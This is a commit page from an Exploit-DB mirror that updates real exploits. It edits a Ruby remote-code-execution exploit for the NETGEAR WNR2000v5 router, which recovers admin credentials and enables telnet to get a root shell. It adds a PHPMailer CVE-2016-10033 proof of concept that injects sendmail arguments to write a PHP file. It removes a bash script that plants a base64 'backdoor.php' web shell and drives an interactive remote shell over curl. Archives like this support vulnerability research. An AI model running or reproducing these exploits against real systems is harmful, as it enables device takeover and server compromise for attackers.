bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-12-28

Browse source 
1 new exploits

PHPMailer 5.2.17 - Remote Code Execution
This commit is contained in:
Offensive Security 2016-12-28 05:01:17 +00:00
parent 6a202bbb97
commit e31e75b15f
4 changed files with 112 additions and 50 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
files.csv
View file

@ -36921,4 +36921,4 @@ id,file,description,date,author,platform,type,port
40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0 40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0
40961,platforms/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps,0 40961,platforms/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps,0
40966,platforms/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,php,webapps,0 40966,platforms/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,php,webapps,0
40968,platforms/php/webapps/40968.sh,"PHPMailer 5.2.17 - Remote Code Execution",2016-12-26,"Dawid Golunski",php,webapps,0 40968,platforms/php/webapps/40968.php,"PHPMailer 5.2.17 - Remote Code Execution",2016-12-26,"Dawid Golunski",php,webapps,0

Can't render this file because it is too large.

54
platforms/cgi/remote/40949.rb
View file

@ -1,6 +1,4 @@
# #
# Source: https://raw.githubusercontent.com/pedrib/PoC/master/exploits/netgearPwn.rb
#
# Remote code execution in NETGEAR WNR2000v5 # Remote code execution in NETGEAR WNR2000v5
# - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security # - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security
# Released on 20/12/2016 # Released on 20/12/2016
@ -10,14 +8,14 @@
# #
# #
# TODO: # TODO:
# - test default credentials first (with correct and incorrect password, see if auth can be used by default with incorrect password)
# - finish telnetenable (get mac and send packet)
# - finish timestamp regex (?)
# - randomise payload # - randomise payload
require 'net/http' require 'net/http'
require 'uri' require 'uri'
require 'time' require 'time'
require 'digest'
require 'openssl'
require 'socket'
#################### ####################
# ported from https://git.uclibc.org/uClibc/tree/libc/stdlib/random.c # ported from https://git.uclibc.org/uClibc/tree/libc/stdlib/random.c
@ -114,8 +112,8 @@ end
##################### #####################
# Ruby code ported from https://github.com/insanid/netgear-telenetenable # Ruby code ported from https://github.com/insanid/netgear-telenetenable
# #
def telnetenable (mac, username, password) def telnetenable (username, password)
mac_pad = mac.gsub(':', '').upcase.ljust(0x10,"\x00") mac_pad = @mac.gsub(':', '').upcase.ljust(0x10,"\x00")
username_pad = username.ljust(0x10, "\x00") username_pad = username.ljust(0x10, "\x00")
password_pad = password.ljust(0x21, "\x00") password_pad = password.ljust(0x21, "\x00")
cleartext = (mac_pad + username_pad + password_pad).ljust(0x70, "\x00") cleartext = (mac_pad + username_pad + password_pad).ljust(0x70, "\x00")
@ -130,8 +128,9 @@ def telnetenable (mac, username, password)
cipher.key = secret_key cipher.key = secret_key
cipher.padding = 0 cipher.padding = 0
binary_data = (cipher.update(payload) << cipher.final) binary_data = (cipher.update(payload) << cipher.final)
binary_data.unpack('N*').pack('V*') s = UDPSocket.new
s.send(binary_data.unpack('N*').pack('V*'), 0, @target.split(':')[0], 23)
end end
##################### #####################
@ -169,8 +168,8 @@ def get_request(uri_str)
uri = URI.parse(uri_str) uri = URI.parse(uri_str)
http = Net::HTTP.new(uri.host, uri.port) http = Net::HTTP.new(uri.host, uri.port)
#http.set_debug_output($stdout) #http.set_debug_output($stdout)
request = Net::HTTP::Get.new(uri.request_uri)
request.basic_auth(USERNAME, PASSWORD) request.basic_auth(USERNAME, PASSWORD)
request = Net::HTTP::Get.new(uri.request_uri)
http.request(request) http.request(request)
end end
@ -179,8 +178,8 @@ def post_request(uri_str, body)
header = { 'Content-Type' => 'application/x-www-form-urlencoded' } header = { 'Content-Type' => 'application/x-www-form-urlencoded' }
http = Net::HTTP.new(uri.host, uri.port) http = Net::HTTP.new(uri.host, uri.port)
#http.set_debug_output($stdout) #http.set_debug_output($stdout)
request = Net::HTTP::Post.new(uri.request_uri, header)
request.basic_auth(USERNAME, PASSWORD) request.basic_auth(USERNAME, PASSWORD)
request = Net::HTTP::Post.new(uri.request_uri, header)
request.body = body request.body = body
http.request(request) http.request(request)
end end
@ -246,9 +245,9 @@ end
def get_auth_timestamp(mode) def get_auth_timestamp(mode)
if mode == "bof" if mode == "bof"
uri_str = "lang_check.html" uri_str = "http://#{@target}/lang_check.html"
else else
uri_str = "PWD_password.htm" uri_str = "http://#{@target}/PWD_password.htm"
end end
response = get_request(uri_str) response = get_request(uri_str)
if response.code == 401 if response.code == 401
@ -268,10 +267,10 @@ def got_shell
end end
if ARGV.length < 2 if ARGV.length < 2
puts "Usage: ./netgearPwn.rb <IP:PORT> <check|sploit|telnet> [noreboot]" puts "Usage: ./netgearPwn.rb <IP:PORT> <check|bof|telnet <MAC>> [noreboot]"
puts "\tcheck: see if the target is vulnerable" puts "\tcheck: see if the target is vulnerable"
puts "\tbof: run buffer overflow exploit on the target" puts "\tbof: run buffer overflow exploit on the target"
puts "\ttelnet: run telnet exploit on the target - DO NOT USE FOR NOW, DOESN'T WORK!" puts "\ttelnet <mac>: run telnet exploit on the target, needs MAC address"
puts "\tnoreboot: optional parameter - don't force a reboot on the target" puts "\tnoreboot: optional parameter - don't force a reboot on the target"
exit(1) exit(1)
end end
@ -279,12 +278,23 @@ end
@target = ARGV[0] @target = ARGV[0]
mode = ARGV[1] mode = ARGV[1]
if ARGV.length == 3 && ARGV[2] == "noreboot" if (ARGV.length > 2 && ARGV[2] == "noreboot") || (ARGV.length > 3 && ARGV[3] == "noreboot")
reboot = false reboot = false
else else
reboot = true reboot = true
end end
if mode == "telnet"
if ARGV.length == 3
@mac = ARGV[2]
elsif ARGV.length == 4
@mac = ARGV[3]
else
puts "[-] telnet mode needs MAC address argument!"
exit(-1)
end
end
# Maximum time differential to try # Maximum time differential to try
# Look 5000 seconds back for the timestamp with reboot # Look 5000 seconds back for the timestamp with reboot
# 500000 with no reboot # 500000 with no reboot
@ -383,11 +393,11 @@ while true
if response.code == "200" if response.code == "200"
# this only occurs in the telnet case # this only occurs in the telnet case
credentials = get_password credentials = get_password
#telnetenable(mac, credentials[0], credentials[1]) telnetenable(credentials[0], credentials[1])
#sleep 5 sleep 5
#got_shell got_shell
puts "Done! Got admin username #{credentials[0]} and password #{credentials[1]}" #puts "Done! Got admin username #{credentials[0]} and password #{credentials[1]}"
puts "Use the telnetenable.py script (https://github.com/insanid/netgear-telenetenable) to enable telnet, and connect to port 23 to get a root shell!" #puts "Use the telnetenable.py script (https://github.com/insanid/netgear-telenetenable) to enable telnet, and connect to port 23 to get a root shell!"
exit(0) exit(0)
end end
rescue EOFError rescue EOFError
@ -425,4 +435,4 @@ while true
end end
# If we get here then the exploit failed # If we get here then the exploit failed
puts "[-] Exploit finished. Failed to get a shell!" puts "[-] Exploit finished. Failed to get a shell!"

79
platforms/php/webapps/40968.php Executable file
View file

@ -0,0 +1,79 @@
<?php
/*
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
Discovered/Coded by:
Dawid Golunski (@dawid_golunski)
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == [some"@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
The resulting file will contain the payload passed in the body of the msg:
09607 <<< --b1_cb4566aa51be9f090d9419163e492306
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<
09607 <<< --b1_cb4566aa51be9f090d9419163e492306--
See the full advisory URL for details.
*/
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com';
$msg_body = "<?php phpinfo(); ?>";
// ------------------
// mail() param injection via the vulnerability in PHPMailer
require_once('class.phpmailer.php');
$mail = new PHPMailer(); // defaults to using php "mail()"
$mail->SetFrom($email_from, 'Client Name');
$address = "customer_feedback@company-X.com";
$mail->AddAddress($address, "Some User");
$mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033";
$mail->MsgHTML($msg_body);
if(!$mail->Send()) {
echo "Mailer Error: " . $mail->ErrorInfo;
} else {
echo "Message sent!\n";
}
?>

27
platforms/php/webapps/40968.sh
View file

@ -1,27 +0,0 @@
#!/bin/bash
# CVE-2016-10033 exploit by opsxcq
# https://github.com/opsxcq/exploit-CVE-2016-10033
echo '[+] CVE-2016-10033 exploit by opsxcq'
if [ -z "$1" ]
then
echo '[-] Please inform an host as parameter'
exit -1
fi
host=$1
echo '[+] Exploiting '$host
curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\nvulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php'
cmd='whoami'
while [ "$cmd" != 'exit' ]
do
echo '[+] Running '$cmd
curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d
echo
read -p 'RemoteShell> ' cmd
done
echo '[+] Exiting'